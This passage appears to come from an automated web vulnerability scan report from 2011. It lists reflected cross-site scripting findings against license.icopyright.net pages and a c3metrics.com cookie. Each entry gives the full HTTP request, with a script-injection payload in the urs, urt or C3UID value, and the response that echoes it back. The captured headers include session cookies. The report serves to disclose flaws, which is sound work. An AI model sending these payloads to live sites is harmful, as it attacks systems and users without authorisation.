HfT7srmoLMmMYwTtDyt7dohSAfrb/B7shmxeIhC7Xdm62f5YOCi7VnQ25U96jf6V5u7ADZwigBDvvvtDCgBpD1qrpk5pp4l152gjxk4EQYYr9wK4KSK+RT6QdLqpLmEZit5Qwmufxfw02Q48TSIdQh8bEBLwbz5yeNAP3lYHA3/yI9iOq7R0oFD8y4sxZT4qIFLUplwQGJni2pRVG3ZpqBgCqmWoApZw2LkxfS9ozRkR5lKkLCp+8CLuIB6eTs791Nx11Avipvs5BgJHxC96nQQOxCCjvABvhdxvIML0oZ25qey4qO5JlLmXLv3H69/srXaHpuF0I1yC8xzyfGwzdFShq6QGPGCHpf8JIrSvVXukYt8ee58Gc30EvqlxSK3HE9/BmDzgFiJBr6iPHhVfzHL2sV9j6BQQYc+Yn6SUBKiCMGIjDrFGxoTHwByfc2v/aSMT45dNX64BwOyL89dYdND8vOzxYS/8AaxCCDscccYcQ9L4kWtDHZ4zM7NQFnbPkAVzIU5TPUo2EJ8Rhi/bSKU7znZqNZruBBE7WnlneSmXPTIH+qfpA="; rsi_us_1000000="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"; udm_0=MLv3NzUNZjhr3tNDUOn9R09Q/iVINsi+A+62LxZQIiiDoaro9jANDYuXCoMWXJpEr578X/X/rStRjsP29zg0eOpl2kN6IAh9mCZ6f40jwpXbbR+M1nJLx0XUrtRq+BAu8ru7oLa+85zbDpVa3xBcWiHxY9A7dq3vlkyv1tnZ/vyxy4fwHWFmR9Iz9qnb6JniT6m5GU/0iA+/u2lQ+sDDQ0DsfbD/1HdpBDpIesxPX8JYnddhi+eqbbvUkZrOLLaCtlYFuo7Ob5E82tMkVARU/PCkJ3dsJIt8ZbjoWqnTI2ek6Dd2MG8ifA/Av5y3VFP3yDjr6k7wjucgDT2WFOo2bfd7pvxilQQmbcV16QUZsLybZw6Qpj8GeQH2POWhO3g7raALq7hM5BQYqhsnKxe2cjW38bmUP0itRNNt4b4aEEv2m9TqUjm5yKtenGu3q/Pb46uAHZrrJx22VDMbjyt/6FpyJYhs1wNQ40ZYZEKAgyKvINMvL+zkd2kE67GkzfB3GNOPg+7Xxq0e3sBqr5fUKuU7f6EupmnTnb8CWrd05apeZ3eWkTixOusVjXSCXkT+/BwVGALQuoZn8FMskA4dYPbfDk5OItDsA7zUDxdjRRXrk2GmX945Da+s1UjZW3U+2xaoJTGLybF07NRPZ1eegSpQDH8u1Si7Y1n+jo7hC29xnK1nt1mMwbul5U1fBU3fsCNiopFyZScl1+BuGFMen8igEiOgzObkp+pdBeVAmrlUtFsnjfjlRhi6K7c0FG/LrKLuG3Kyak18TSY5lYta7kIh4QTHXu0sX+6B0KW7XWoIGo0tcEKmgCVzyNegLa3WK1gjpmROjIsqnfoXpavGi5e+6+WUuqx+UeWUK0e6r/rZ6nCql5SwkI9Jyhf9gPJeAftVgqPS2efn2RBBB8mVKj7/Zzr+ev5n1AX2t+6PuG+NLGg4zUFYLg1dfJDT34/dRV9RX2d8W4Qhz6a0BUfjecgsb9KuZ4RrkG+qRnW7ddvIt2FVfZEmF+lzvhwH6WJIVZP/2d0cyPdC7MwIIbMTXAcLqo+ST1Y6nDncz0vVkuZ+UvNtcVrJUKd8b4UkIT469uS1TR+zkUJnhtPOzR5oPxxfmtE4vTLysJzCsuZY0KaZF3o1b6Yh8paN9qwUBV8R+vYtWNuaXSKaFsAWASQocuwiAYwyatk78mvmhA/RnDRWxFdxotmakTxLvxzdq20H2gNsfqEt7Fr2/Uh+++at/ksN76MFaJqO/bHkpoPu1gxHvKE9/0WMUVGMcm+6yyK+UG+alVWR/xvTeJmgll+2K5e9GyGLi/m3caGDdFwjN956qZoIxWHJA6AgPh7pKjFfoub0NM8jvqk69NazhEPpf3w2zbu+8yR3WGhP8zmoR6Rq73hajz6P98Iz6wvHDPDF7NOh2eR4AjPxQGp004z0qhExX1GC9nQYmTybV4IuJxurDjTji5yZDzRQY7cou3zrZ/OeESC6R5U4GbP69VvQ1FHhRDn7/D8gBKB6tDfEZV4tgGLWbTk+afHTH3j54xDk4yOl6Fx0oXVI2yyVgY27oyTAqHr4erT0JEcynxQEX17ZG6jk0i7Lvp6W1t6qdrx4IjeSjvpTp2NgZepvB/QSSCrrLZmWLcfno6pocoCk4/2SxgR5UeVjIHZgwNuNyBaWMutI8AJTw/0lL66llJmLjDmyMjB1t3dxVUjfg4suAfkuSjQR4zU9jwdsDhHM2yr45NHlR80Odampgef9bMqJglD/rX8j1N+u6IunIEoNNi4sdBAnypfFOOaEJ678vsSgaICcHnT5o+Wd; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; rtc_N2gr=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; rsi_segs_1000000=pUPF40mhOXMQJ/AtY6gq+mlXT522ui4UYAcRGaESFrJx8TYUFUcMpoM7enamDct4VKj1xrFdOTqQUQ3pUP1MDghOnCvRZ0214o3xUtaZ68nIc1VnMLmCIeegv3Y1WwDp8AIdZ5hqHKU38yRCkO6EVyoNTQYIOyyB1bbJfhYCtxeN4FAMThtqRqzLjZec6jzqKUqLrjFKfNTfGk4gg0636KgeJeemkPacnGpzcBVfhaHGh5+5HatXnwl381BaqY81KvvzuBGONoXhIx83OpFD1tR3YfP3a7TkLLmV2qsPCs2IcxdTv8Z16030H4XyXKyhS7zAQxpqNX2/4kAmja7XaES27kxmvzOlOPMbUj6Cm3SfhwUTUthzNXzAtwRv6N00BGCYDAEY0T/+ocHSxN122t3XU3Lo1znyYeQ5gm98FTKbZYCcHFYUxDfLnpQh/6WqsBCfkrnJY6wvtK/jYdP7J9OWHJkd7czh0TuDEHoC49Ec5JTCdMeKygbXcL5Lf3iaMe9U018EYDX8emPwX8aTEio9Ynai0hDVaDgWj97fMo3h52SvvCg+a19cEIM3kBs+74ch0R+eVGZ+XE7xwIhKXTKkfJdg/3giiKh210fg/DaUe0yC7PRLTYPHOA+VejPfTuHoHDTX+/kUH2Zmc9IQpJmuppdilLBRA2hqW5r1TlfG4514tvrmi17RqHW6+HrVV40axtQ8MF8jfSxfZkXojxtpdBcKyJ9yZNzbCDC3ghRqJkiyUvtT2jSVAmK/flOnpnuLsUg3lzgJ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 23 Jun 2011 11:12:02 GMT
Cache-Control: max-age=86400, private
Expires: Fri, 24 Jun 2011 11:12:02 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Thu, 23 Jun 2011 11:12:02 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G07610B1454<SCRIPT>ALERT(1)</SCRIPT>30211BF6439" was not recognized.
*/

3.33. http://license.icopyright.net/rights/offer.act [urs parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://license.icopyright.net
Path:	/rights/offer.act

Issue detail

The value of the urs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fba9"><script>alert(1)</script>d57c954ecc2 was submitted in the urs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rights/offer.act?inprocess=t&sid=18&tag=7.7009&urs=WEBPAGE5fba9"><script>alert(1)</script>d57c954ecc2&urt=http%3A%2F%2Fwww.sqlmag.com%2Farticle%2Fsql-server%2Fhardening%2520sql%2520server-135858 HTTP/1.1
Host: license.icopyright.net
Proxy-Connection: keep-alive
Referer: http://license.icopyright.net/rights/tag.act?tag=7.7009
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A9CDA4EB3FDC025F39C802E4AD94520C; __utmz=37128509.1308838673.1.1.utmcsr=sqlmag.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/sql-server/hardening%20sql%20server-135858; __utma=37128509.1704898354.1308838673.1308838673.1308838673.1; __utmc=37128509; __utmb=37128509.1.10.1308838673

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:18:29 GMT
Server: Apache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
iCo
...[SNIP]...
<input type="hidden" name="urs" value="WEBPAGE5fba9"><script>alert(1)</script>d57c954ecc2">
...[SNIP]...

3.34. http://license.icopyright.net/rights/offer.act [urt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://license.icopyright.net
Path:	/rights/offer.act

Issue detail

The value of the urt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68123"><script>alert(1)</script>b394c305edc was submitted in the urt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rights/offer.act?inprocess=t&sid=18&tag=7.7009&urs=WEBPAGE&urt=http%3A%2F%2Fwww.sqlmag.com%2Farticle%2Fsql-server%2Fhardening%2520sql%2520server-13585868123"><script>alert(1)</script>b394c305edc HTTP/1.1
Host: license.icopyright.net
Proxy-Connection: keep-alive
Referer: http://license.icopyright.net/rights/tag.act?tag=7.7009
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A9CDA4EB3FDC025F39C802E4AD94520C; __utmz=37128509.1308838673.1.1.utmcsr=sqlmag.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/sql-server/hardening%20sql%20server-135858; __utma=37128509.1704898354.1308838673.1308838673.1308838673.1; __utmc=37128509; __utmb=37128509.1.10.1308838673

Response

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:18:34 GMT
Server: Apache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
iCo
...[SNIP]...
<input type="hidden" name="urt" value="http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-13585868123"><script>alert(1)</script>b394c305edc">
...[SNIP]...

3.35. http://license.icopyright.net/rights/postPdfServiceGroup.act [urs parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://license.icopyright.net
Path:	/rights/postPdfServiceGroup.act

Issue detail

The value of the urs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e3ff"><script>alert(1)</script>1128ae9df21 was submitted in the urs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /rights/postPdfServiceGroup.act?inprocess=t&tag=7.7009&urs=WEBPAGE9e3ff"><script>alert(1)</script>1128ae9df21&urt=http%3A%2F%2Fwww.sqlmag.com%2Farticle%2Fsql-server%2Fhardening%2520sql%2520server-135858 HTTP/1.1
Host: license.icopyright.net
Proxy-Connection: keep-alive
Referer: http://license.icopyright.net/rights/tag.act?tag=7.7009
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A9CDA4EB3FDC025F39C802E4AD94520C; __utmz=37128509.1308838673.1.1.utmcsr=sqlmag.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/sql-server/hardening%20sql%20server-135858; __utma=37128509.1704898354.1308838673.1308838673.1308838673.1; __utmc=37128509; __utmb=37128509.1.10.1308838673

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:18:33 GMT
Server: Apache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
iCo
...[SNIP]...
<input type="hidden" name="urs" value="WEBPAGE9e3ff"><script>alert(1)</script>1128ae9df21">
...[SNIP]...

3.36. http://license.icopyright.net/rights/postPdfServiceGroup.act [urt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://license.icopyright.net
Path:	/rights/postPdfServiceGroup.act

Issue detail

The value of the urt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b2a5"><script>alert(1)</script>04e7808d39e was submitted in the urt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /rights/postPdfServiceGroup.act?inprocess=t&tag=7.7009&urs=WEBPAGE&urt=http%3A%2F%2Fwww.sqlmag.com%2Farticle%2Fsql-server%2Fhardening%2520sql%2520server-1358583b2a5"><script>alert(1)</script>04e7808d39e HTTP/1.1
Host: license.icopyright.net
Proxy-Connection: keep-alive
Referer: http://license.icopyright.net/rights/tag.act?tag=7.7009
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A9CDA4EB3FDC025F39C802E4AD94520C; __utmz=37128509.1308838673.1.1.utmcsr=sqlmag.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/sql-server/hardening%20sql%20server-135858; __utma=37128509.1704898354.1308838673.1308838673.1308838673.1; __utmc=37128509; __utmb=37128509.1.10.1308838673

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:18:41 GMT
Server: Apache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
iCo
...[SNIP]...
<input type="hidden" name="urt" value="http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-1358583b2a5"><script>alert(1)</script>04e7808d39e">
...[SNIP]...

3.37. http://license.icopyright.net/rights/postServiceGroup.act [urs parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://license.icopyright.net
Path:	/rights/postServiceGroup.act

Issue detail

The value of the urs request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bafc3"><script>alert(1)</script>e3cdfec31de was submitted in the urs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /rights/postServiceGroup.act?inprocess=t&tag=7.7009&urs=WEBPAGEbafc3"><script>alert(1)</script>e3cdfec31de&urt=http%3A%2F%2Fwww.sqlmag.com%2Farticle%2Fsql-server%2Fhardening%2520sql%2520server-135858 HTTP/1.1
Host: license.icopyright.net
Proxy-Connection: keep-alive
Referer: http://license.icopyright.net/rights/tag.act?tag=7.7009
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A9CDA4EB3FDC025F39C802E4AD94520C; __utmz=37128509.1308838673.1.1.utmcsr=sqlmag.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/sql-server/hardening%20sql%20server-135858; __utma=37128509.1704898354.1308838673.1308838673.1308838673.1; __utmc=37128509; __utmb=37128509.1.10.1308838673

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:18:41 GMT
Server: Apache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
iCo
...[SNIP]...
<input type="hidden" name="urs" value="WEBPAGEbafc3"><script>alert(1)</script>e3cdfec31de">
...[SNIP]...

3.38. http://license.icopyright.net/rights/postServiceGroup.act [urt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://license.icopyright.net
Path:	/rights/postServiceGroup.act

Issue detail

The value of the urt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d75a3"><script>alert(1)</script>b51922f184e was submitted in the urt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /rights/postServiceGroup.act?inprocess=t&tag=7.7009&urs=WEBPAGE&urt=http%3A%2F%2Fwww.sqlmag.com%2Farticle%2Fsql-server%2Fhardening%2520sql%2520server-135858d75a3"><script>alert(1)</script>b51922f184e HTTP/1.1
Host: license.icopyright.net
Proxy-Connection: keep-alive
Referer: http://license.icopyright.net/rights/tag.act?tag=7.7009
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=A9CDA4EB3FDC025F39C802E4AD94520C; __utmz=37128509.1308838673.1.1.utmcsr=sqlmag.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/sql-server/hardening%20sql%20server-135858; __utma=37128509.1704898354.1308838673.1308838673.1308838673.1; __utmc=37128509; __utmb=37128509.1.10.1308838673

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 23 Jun 2011 14:18:51 GMT
Server: Apache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
iCo
...[SNIP]...
<input type="hidden" name="urt" value="http://www.sqlmag.com/article/sql-server/hardening%20sql%20server-135858d75a3"><script>alert(1)</script>b51922f184e">
...[SNIP]...

3.39. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload fc3e2<script>alert(1)</script>0fb8136e609 was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

